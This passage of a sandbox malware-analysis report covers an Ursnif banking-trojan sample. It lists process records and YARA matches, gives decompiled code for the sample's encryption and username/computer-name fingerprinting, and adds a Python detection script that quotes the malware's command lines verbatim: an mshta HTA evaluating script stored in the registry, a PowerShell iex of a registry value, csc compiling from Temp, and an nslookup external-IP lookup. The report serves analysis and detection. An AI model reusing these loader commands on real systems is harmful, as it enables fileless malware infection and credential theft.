                                                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000026.00000000.689267141.00000000000B0000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000026.00000003.693266563.000001BF361AC000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000026.00000003.693369864.000001BF361AC000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000026.00000000.690928250.00000000000B0000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000026.00000000.692180683.00000000000B0000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000026.00000003.693393885.000001BF361AC000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000026.00000002.758341683.000001BF361AC000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000026.00000003.740363457.000001BF361AC000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Author: Joe Security

                                                        General

                                                        Start time:09:57:56
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                        Imagebase:0x7ff6bbfa0000
                                                        File size:99272 bytes
                                                        MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000027.00000002.798303359.000002413CA11000.00000020.00020000.sdmp, Author: Joe Security

                                                        General

                                                        Start time:09:57:57
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\System32\rundll32.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                                                        Imagebase:0x7ff616d10000
                                                        File size:69632 bytes
                                                        MD5 hash:73C519F050C20580F8A62C849D49215A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000028.00000000.752570656.00000195D8AB0000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000028.00000002.756395478.00000195D906C000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000028.00000003.754195346.00000195D906C000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000028.00000003.754218301.00000195D906C000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000028.00000000.743168465.00000195D8AB0000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000028.00000003.754002783.00000195D906C000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000028.00000000.745515956.00000195D8AB0000.00000040.00020000.sdmp, Author: Joe Security

                                                        General

                                                        Start time:09:58:01
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\76A9.bi1'
                                                        Imagebase:0x7ff7eef80000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:09:58:05
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7ecfc0000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:09:58:05
                                                        Start date:10/09/2021
                                                        Path:C:\Windows\System32\nslookup.exe
                                                        Wow64 process (32bit):
                                                        Commandline:nslookup myip.opendns.com resolver1.opendns.com
                                                        Imagebase:
                                                        File size:86528 bytes
                                                        MD5 hash:AF1787F1DBE0053D74FC687E7233F8CE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

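The process chain recorded above (mshta.exe evaluating script read out of the registry, PowerShell running iex on a registry value, csc.exe compiling a source file from the user's Temp folder, an external IP lookup through nslookup) is the sequence a hunter turns into detection rules. The block below is an added example and is not part of the Joe Sandbox report or of the sample: it runs such rules over process-creation records constructed from the command lines shown in the process list. The record layout, the pid/ppid values, the benign control records and the rule names are assumptions; only the image paths and command lines are taken from the report.

```python
"""Added detection example for the process chain in this report (not report output).
Record layout (pid, ppid, image, cmdline), pid/ppid values, rule names and the
benign control records are assumptions; image paths and command lines come
from the report's process list."""
import re

# Constructed sample process-creation events (pids assumed, command lines from the report).
EVENTS = [
    (3000, 2000, r"C:\Windows\System32\mshta.exe",
     r"'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'"),
    (3100, 3000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))"),
    (3200, 3100, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     r"'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline'"),
    (3300, 1500, r"C:\Windows\System32\cmd.exe",
     r"cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\76A9.bi1'"),
    # Constructed benign control records that must not fire.
    (4000, 2000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -File C:\scripts\inventory.ps1"),
    (4100, 2000, r"C:\Windows\System32\nslookup.exe",
     r"nslookup intranet.example.test"),
]

# Each rule: name, image basename it applies to (None = any), regex over the command line.
RULES = [
    # Inline HTA whose script pulls its payload out of the registry.
    ("mshta_inline_hta_regread", "mshta.exe",
     re.compile(r"about:<hta:application>.*\.regread\(", re.I)),
    # Invoke-Expression on a value read from HKCU\...\AppDataLow.
    ("powershell_iex_registry_blob", "powershell.exe",
     re.compile(r"\biex\b.*\b(gp|get-itemproperty)\b.*HKCU:.*AppDataLow", re.I)),
    # C# compiler fed a .cmdline response file from the user's Temp folder.
    ("csc_compile_from_user_temp", "csc.exe",
     re.compile(r"@'?[a-z]:\\users\\[^']+\\appdata\\local\\temp\\.*\.cmdline", re.I)),
    # External IP discovery through OpenDNS' myip service.
    ("external_ip_lookup_via_nslookup", None,
     re.compile(r"nslookup\s+myip\.opendns\.com", re.I)),
]

# GUID-named subkey under HKCU\Software\AppDataLow\Software\Microsoft, with one or more
# backslashes as separator so both the JScript-escaped and the PowerShell form match.
REG_KEY = re.compile(
    r"AppDataLow\\+Software\\+Microsoft\\+([0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12})", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def match_rules(events):
    """Return [(pid, rule_name)] for every event whose command line trips a rule."""
    hits = []
    for pid, _ppid, image, cmdline in events:
        for name, image_name, pattern in RULES:
            if image_name and basename(image) != image_name:
                continue
            if pattern.search(cmdline):
                hits.append((pid, name))
    return hits


def registry_keys(events):
    """GUID-named AppDataLow keys referenced by any command line (upper-cased, de-duplicated)."""
    return {m.group(1).upper() for _, _, _, c in events for m in REG_KEY.finditer(c)}


def chains(events):
    """(mshta pid, powershell pid, csc pid) triples where each spawned the next (parent links assumed)."""
    by_pid = {e[0]: e for e in events}
    out = []
    for pid, ppid, image, _ in events:
        if basename(image) != "csc.exe":
            continue
        parent = by_pid.get(ppid)
        if not parent or basename(parent[2]) != "powershell.exe":
            continue
        grandparent = by_pid.get(parent[1])
        if grandparent and basename(grandparent[2]) == "mshta.exe":
            out.append((grandparent[0], parent[0], pid))
    return out


if __name__ == "__main__":
    for pid, name in match_rules(EVENTS):
        print(f"pid {pid}: {name}")
    print("registry keys referenced:", registry_keys(EVENTS))
    print("mshta -> powershell -> csc chains:", chains(EVENTS))
```

The registry correlation is the useful part: the mshta and powershell command lines reference the same GUID-named key, which is where the stored script lives. On a live host that location can be inspected with `Get-ChildItem HKCU:\Software\AppDataLow\Software\Microsoft`; a GUID-named subkey holding string values that decode to script (the report shows the value names DeviceFile and UtilTool) is the artifact the two command lines read.
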
                                                        Disassembly

                                                        Code Analysis


                                                          Executed Functions

                                                          Control-flow Graph

                                                          • Graph rendering not preserved. Function entry 0x05586657; basic blocks span 0x05586657-0x05586AE8 and call subfunctions 0x05585EA9, 0x0558AA55, 0x0559324E, 0x055889A2, 0x0557297D, 0x05581843, 0x0557529F, 0x0558FA1F, 0x0557231D, 0x0558D2DD, 0x05579C77, 0x0558DA6E, 0x05580C6E, 0x0558E3F3, 0x05577B4A, 0x05583B58 and 0x0557FA9C; the Win32/NTDLL calls made from these blocks are listed under APIs below.
                                                          APIs
                                                          • RtlInitializeCriticalSection.NTDLL(0559C328), ref: 05586675
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • memset.NTDLL ref: 055866A6
                                                          • RtlInitializeCriticalSection.NTDLL(059BB148), ref: 055866B7
                                                            • Part of subcall function 0558AA55: RtlInitializeCriticalSection.NTDLL(0559C300), ref: 0558AA79
                                                            • Part of subcall function 0558AA55: RtlInitializeCriticalSection.NTDLL(0559C2E0), ref: 0558AA8F
                                                            • Part of subcall function 0558AA55: GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,05592B24), ref: 0558AAA0
                                                            • Part of subcall function 0558AA55: GetModuleHandleA.KERNEL32(0000170B), ref: 0558AAD4
                                                            • Part of subcall function 0559324E: RtlAllocateHeap.NTDLL(00000000,-00000003,77A19EB0), ref: 05593268
                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000060), ref: 055866E0
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,05592B24), ref: 055866F1
                                                          • CloseHandle.KERNEL32(000003F4), ref: 05586705
                                                          • GetUserNameA.ADVAPI32(00000000,?), ref: 0558674E
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05586761
                                                          • GetUserNameA.ADVAPI32(00000000,?), ref: 05586776
                                                          • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 055867A6
                                                          • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 055867BB
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,05592B24), ref: 055867C5
                                                          • CloseHandle.KERNEL32(00000000), ref: 055867D2
                                                          • GetShellWindow.USER32 ref: 055867ED
                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 055867F4
                                                          • memcpy.NTDLL(0559C1E4,?,00000018), ref: 05586830
                                                          • CreateEventA.KERNEL32(0559C1A8,00000001,00000000,00000000,?,00000001), ref: 055868B3
                                                          • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 055868DD
                                                          • OpenEventA.KERNEL32(00100000,00000000,059BA9E0), ref: 05586905
                                                          • CreateEventA.KERNEL32(0559C1A8,00000001,00000000,059BA9E0), ref: 05586918
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,05592B24), ref: 0558691E
                                                          • GetLastError.KERNEL32(0558C5EB,0559C0FC,0559C100), ref: 055869A4
                                                          • LoadLibraryA.KERNEL32(?,0558C5EB,0559C0FC,0559C100), ref: 055869BF
                                                          • SetEvent.KERNEL32(?,Function_000035E1,00000000,00000000), ref: 05586A54
                                                          • RtlAllocateHeap.NTDLL(00000000,00000052,Function_000035E1), ref: 05586A69
                                                          • wsprintfA.USER32 ref: 05586A99
                                                            • Part of subcall function 0558DA6E: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 0558DAE4
                                                            • Part of subcall function 05580C6E: HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 05580CDF
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Allocate$CriticalErrorEventInitializeLastSection$CreateHandleProcess$CloseFreeNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
                                                          • String ID:
                                                          • API String ID: 2659885799-0
                                                          • Opcode ID: 207d43347ae3d298452ef4f88489ac6cf53e220782781c6bfd61fd66a80c715d
                                                          • Instruction ID: c46076cc4551a889c4dd070aa2515a3d41de0aa342f0a0a91e8a82250a27c1d4
                                                          • Opcode Fuzzy Hash: 207d43347ae3d298452ef4f88489ac6cf53e220782781c6bfd61fd66a80c715d
                                                          • Instruction Fuzzy Hash: F9C1A070614305DFDB20EF65E84A93A7BE9FB54700B52481EF146E7240DF39A848EF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Graph rendering not preserved. Function entry 0x00E53276; basic blocks span 0x00E53276-0x00E5341D, call subfunctions 0x00E55FBC and 0x00E513CC, and invoke CryptAcquireContextW, memcpy, CryptImportKey, CryptSetKeyParam, CryptEncrypt, CryptDecrypt, GetLastError, CryptDestroyKey and CryptReleaseContext.
                                                          C-Code - Quality: 58%
                                                          			E00E53276(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                          				int _v8;
                                                          				long* _v12;
                                                          				int _v16;
                                                          				BYTE* _v20;
                                                          				long* _v24;
                                                          				void* _v39;
                                                          				char _v40;
                                                          				void _v56;
                                                          				int _v60;
                                                          				intOrPtr _v64;
                                                          				void _v67;
                                                          				char _v68;
                                                          				void* _t61;
                                                          				int _t68;
                                                          				signed int _t76;
                                                          				int _t79;
                                                          				int _t81;
                                                          				int _t85;
                                                          				long _t86;
                                                          				int _t90;
                                                          				signed int _t94;
                                                          				int _t101;
                                                          				BYTE* _t102;
                                                          				int _t103;
                                                          				void* _t104;
                                                          				void* _t105;
                                                          				void* _t106;
                                                          
                                                          				_t103 = __eax;
                                                          				_t94 = 6;
                                                          				_v68 = 0;
                                                          				memset( &_v67, 0, _t94 << 2);
                                                          				_t105 = _t104 + 0xc;
                                                          				asm("stosw");
                                                          				asm("stosb");
                                                          				_v40 = 0;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosw");
                                                          				asm("stosb");
                                                          				_t61 =  *0xe5a0dc( &_v24, 0, 0, 0x18, 0xf0000000); // executed
                                                          				if(_t61 == 0) {
                                                          					_a8 = GetLastError();
                                                          				} else {
                                                          					_t101 = 0x10;
                                                          					memcpy( &_v56, _a8, _t101);
                                                          					_t106 = _t105 + 0xc;
                                                          					_v60 = _t101;
                                                          					_v67 = 2;
                                                          					_v64 = 0x660e;
                                                          					_v68 = 8;
                                                          					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
                                                          					if(_t68 == 0) {
                                                          						_a8 = GetLastError();
                                                          					} else {
                                                          						_push(0);
                                                          						_push( &_v40);
                                                          						_push(1);
                                                          						_push(_v12);
                                                          						if( *0xe5a0b8() == 0) {
                                                          							_a8 = GetLastError();
                                                          						} else {
                                                          							_t18 = _t103 + 0xf; // 0x10
                                                          							_t76 = _t18 & 0xfffffff0;
                                                          							if(_a4 != 0 && _t76 == _t103) {
                                                          								_t76 = _t76 + _t101;
                                                          							}
                                                          							_t102 = E00E55FBC(_t76);
                                                          							_v20 = _t102;
                                                          							if(_t102 == 0) {
                                                          								_a8 = 8;
                                                          							} else {
                                                          								_v16 = 0;
                                                          								_a8 = 0;
                                                          								while(1) {
                                                          									_t79 = 0x10;
                                                          									_v8 = _t79;
                                                          									if(_t103 <= _t79) {
                                                          										_v8 = _t103;
                                                          									}
                                                          									memcpy(_t102, _a12, _v8);
                                                          									_t81 = _v8;
                                                          									_a12 = _a12 + _t81;
                                                          									_t103 = _t103 - _t81;
                                                          									_t106 = _t106 + 0xc;
                                                          									if(_a4 == 0) {
                                                          										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
                                                          									} else {
                                                          										_t85 =  *0xe5a0d4(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
                                                          									}
                                                          									if(_t85 == 0) {
                                                          										break;
                                                          									}
                                                          									_t90 = _v8;
                                                          									_v16 = _v16 + _t90;
                                                          									_t102 =  &(_t102[_t90]);
                                                          									if(_t103 != 0) {
                                                          										continue;
                                                          									} else {
                                                          										L17:
                                                          										 *_a16 = _v20;
                                                          										 *_a20 = _v16;
                                                          									}
                                                          									goto L21;
                                                          								}
                                                          								_t86 = GetLastError();
                                                          								_a8 = _t86;
                                                          								if(_t86 != 0) {
                                                          									E00E513CC(_v20);
                                                          								} else {
                                                          									goto L17;
                                                          								}
                                                          							}
                                                          						}
                                                          						L21:
                                                          						CryptDestroyKey(_v12);
                                                          					}
                                                          					CryptReleaseContext(_v24, 0);
                                                          				}
                                                          				return _a8;
                                                          			}
                                                          0x00e5327f
                                                          0x00e53285
                                                          0x00e53288
                                                          0x00e5328e
                                                          0x00e5328e
                                                          0x00e53290
                                                          0x00e53292
                                                          0x00e53295
                                                          0x00e5329b
                                                          0x00e5329c
                                                          0x00e5329d
                                                          0x00e532a3
                                                          0x00e532a8
                                                          0x00e532ae
                                                          0x00e532b6
                                                          0x00e53413
                                                          0x00e532bc
                                                          0x00e532be
                                                          0x00e532c7
                                                          0x00e532cc
                                                          0x00e532de
                                                          0x00e532e1
                                                          0x00e532e5
                                                          0x00e532ec
                                                          0x00e532f0
                                                          0x00e532f8
                                                          0x00e533fe
                                                          0x00e532fe
                                                          0x00e532fe
                                                          0x00e53302
                                                          0x00e53303
                                                          0x00e53305
                                                          0x00e53310
                                                          0x00e533ea
                                                          0x00e53316
                                                          0x00e53316
                                                          0x00e53319
                                                          0x00e5331f
                                                          0x00e53325
                                                          0x00e53325
                                                          0x00e5332d
                                                          0x00e53331
                                                          0x00e53334
                                                          0x00e533db
                                                          0x00e5333a
                                                          0x00e53340
                                                          0x00e53343
                                                          0x00e53346
                                                          0x00e53348
                                                          0x00e5334b
                                                          0x00e5334e
                                                          0x00e53350
                                                          0x00e53350
                                                          0x00e5335a
                                                          0x00e5335f
                                                          0x00e53362
                                                          0x00e53365
                                                          0x00e53367
                                                          0x00e53370
                                                          0x00e5339a
                                                          0x00e53372
                                                          0x00e53383
                                                          0x00e53383
                                                          0x00e533a2
                                                          0x00000000
                                                          0x00000000
                                                          0x00e533a4
                                                          0x00e533a7
                                                          0x00e533aa
                                                          0x00e533ae
                                                          0x00000000
                                                          0x00e533b0
                                                          0x00e533bf
                                                          0x00e533c5
                                                          0x00e533cd
                                                          0x00e533cd
                                                          0x00000000
                                                          0x00e533ae
                                                          0x00e533b2
                                                          0x00e533ba
                                                          0x00e533bd
                                                          0x00e533d4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e533bd
                                                          0x00e53334
                                                          0x00e533ed
                                                          0x00e533f0
                                                          0x00e533f0
                                                          0x00e53405
                                                          0x00e53405
                                                          0x00e5341d

                                                          APIs
                                                          • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00E56E82,00000001,00E54A9F,00000000), ref: 00E532AE
                                                          • memcpy.NTDLL(00E56E82,00E54A9F,00000010,?,?,?,00E56E82,00000001,00E54A9F,00000000,?,00E571BA,00000000,00E54A9F,?,00000000), ref: 00E532C7
                                                          • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 00E532F0
                                                          • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00E53308
                                                          • memcpy.NTDLL(00000000,00000000,051B9630,00000010), ref: 00E5335A
                                                          • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,051B9630,00000020,?,?,00000010), ref: 00E53383
                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,051B9630,?,?,00000010), ref: 00E5339A
                                                          • GetLastError.KERNEL32(?,?,00000010), ref: 00E533B2
                                                          • GetLastError.KERNEL32 ref: 00E533E4
                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 00E533F0
                                                          • GetLastError.KERNEL32 ref: 00E533F8
                                                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00E53405
                                                          • GetLastError.KERNEL32(?,?,?,00E56E82,00000001,00E54A9F,00000000,?,00E571BA,00000000,00E54A9F,?,00000000,00E54A9F,00000000,051B9630), ref: 00E5340D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                                                          • String ID:
                                                          • API String ID: 1967744295-0
                                                          • Opcode ID: 5c5b585367fc19cefd0de8a0849283e1cd4598d550815bac225f9cefeb7067d7
                                                          • Instruction ID: 7adf6b87320e5603648fabf48e3fedc1f00d2563d6db7a805ed1405dd5aeb4df
                                                          • Opcode Fuzzy Hash: 5c5b585367fc19cefd0de8a0849283e1cd4598d550815bac225f9cefeb7067d7
                                                          • Instruction Fuzzy Hash: 6F515D71900208FFDB109FA5DC84AEEBBB8EB04396F148825F921F6250D7719E189B61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 275 e56cd6-e56cea 276 e56cf4-e56d06 call e559cb 275->276 277 e56cec-e56cf1 275->277 280 e56d08-e56d18 GetUserNameW 276->280 281 e56d5a-e56d67 276->281 277->276 282 e56d69-e56d80 GetComputerNameW 280->282 283 e56d1a-e56d2a RtlAllocateHeap 280->283 281->282 285 e56d82-e56d93 RtlAllocateHeap 282->285 286 e56dbe-e56de0 282->286 283->282 284 e56d2c-e56d39 GetUserNameW 283->284 287 e56d49-e56d58 HeapFree 284->287 288 e56d3b-e56d47 call e556bf 284->288 285->286 289 e56d95-e56d9e GetComputerNameW 285->289 287->282 288->287 290 e56da0-e56dac call e556bf 289->290 291 e56daf-e56db8 HeapFree 289->291 290->291 291->286
                                                          C-Code - Quality: 97%
                                                          			E00E56CD6(char __eax, signed int* __esi) {
                                                          				long _v8;
                                                          				char _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				signed int _v28;
                                                          				long _t34;
                                                          				signed int _t39;
                                                          				intOrPtr _t50;
                                                          				char _t59;
                                                          				intOrPtr _t61;
                                                          				void* _t62;
                                                          				void* _t63;
                                                          				signed int* _t64;
                                                          				char _t65;
                                                          				intOrPtr* _t67;
                                                          				void* _t68;
                                                          				signed int* _t69;
                                                          
                                                          				_t69 = __esi;
                                                          				_t65 = __eax;
                                                          				_v8 = 0;
                                                          				_v12 = __eax;
                                                          				if(__eax == 0) {
                                                          					_t59 =  *0xe5a2c8; // 0xbd092303
                                                          					_v12 = _t59;
                                                          				}
                                                          				_t64 = _t69;
                                                          				E00E559CB( &_v12, _t64);
                                                          				if(_t65 != 0) {
                                                          					 *_t69 =  *_t69 ^  *0xe5a2d0 ^ 0x46d76429;
                                                          				} else {
                                                          					_t5 =  &_v8; // 0xe5453b
                                                          					GetUserNameW(0, _t5);
                                                          					_t6 =  &_v8; // 0xe5453b
                                                          					_t50 =  *_t6;
                                                          					if(_t50 != 0) {
                                                          						_t62 = RtlAllocateHeap( *0xe5a290, 0, _t50 + _t50);
                                                          						if(_t62 != 0) {
                                                          							_t7 =  &_v8; // 0xe5453b
                                                          							if(GetUserNameW(_t62, _t7) != 0) {
                                                          								_t8 =  &_v8; // 0xe5453b
                                                          								_t63 = _t62;
                                                          								 *_t69 =  *_t69 ^ E00E556BF( *_t8 +  *_t8, _t63);
                                                          							}
                                                          							HeapFree( *0xe5a290, 0, _t62);
                                                          						}
                                                          					}
                                                          				}
                                                          				_t61 = __imp__;
                                                          				_v8 = _v8 & 0x00000000;
                                                          				GetComputerNameW(0,  &_v8);
                                                          				_t34 = _v8;
                                                          				if(_t34 != 0) {
                                                          					_t68 = RtlAllocateHeap( *0xe5a290, 0, _t34 + _t34);
                                                          					if(_t68 != 0) {
                                                          						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                          							_t63 = _t68;
                                                          							_t69[3] = _t69[3] ^ E00E556BF(_v8 + _v8, _t63);
                                                          						}
                                                          						HeapFree( *0xe5a290, 0, _t68);
                                                          					}
                                                          				}
                                                          				asm("cpuid");
                                                          				_t67 =  &_v28;
                                                          				 *_t67 = 1;
                                                          				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                          				 *(_t67 + 8) = _t63;
                                                          				 *(_t67 + 0xc) = _t64;
                                                          				_t39 = _v16 ^ _v20 ^ _v28;
                                                          				_t69[1] = _t69[1] ^ _t39;
                                                          				return _t39;
                                                          			}
                                                          0x00e56cd6
                                                          0x00e56cde
                                                          0x00e56ce4
                                                          0x00e56ce7
                                                          0x00e56cea
                                                          0x00e56cec
                                                          0x00e56cf1
                                                          0x00e56cf1
                                                          0x00e56cf7
                                                          0x00e56cf9
                                                          0x00e56d06
                                                          0x00e56d67
                                                          0x00e56d08
                                                          0x00e56d08
                                                          0x00e56d0d
                                                          0x00e56d13
                                                          0x00e56d13
                                                          0x00e56d18
                                                          0x00e56d26
                                                          0x00e56d2a
                                                          0x00e56d2c
                                                          0x00e56d39
                                                          0x00e56d3b
                                                          0x00e56d40
                                                          0x00e56d47
                                                          0x00e56d47
                                                          0x00e56d52
                                                          0x00e56d52
                                                          0x00e56d2a
                                                          0x00e56d18
                                                          0x00e56d69
                                                          0x00e56d6f
                                                          0x00e56d79
                                                          0x00e56d7b
                                                          0x00e56d80
                                                          0x00e56d8f
                                                          0x00e56d93
                                                          0x00e56d9e
                                                          0x00e56da5
                                                          0x00e56dac
                                                          0x00e56dac
                                                          0x00e56db8
                                                          0x00e56db8
                                                          0x00e56d93
                                                          0x00e56dc1
                                                          0x00e56dc3
                                                          0x00e56dc6
                                                          0x00e56dc8
                                                          0x00e56dcb
                                                          0x00e56dce
                                                          0x00e56dd8
                                                          0x00e56ddc
                                                          0x00e56de0

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,;E), ref: 00E56D0D
                                                          • RtlAllocateHeap.NTDLL(00000000,;E), ref: 00E56D24
                                                          • GetUserNameW.ADVAPI32(00000000,;E), ref: 00E56D31
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00E5453B,?,?,?,?,?,00E568F7,?,00000001), ref: 00E56D52
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00E56D79
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00E56D8D
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00E56D9A
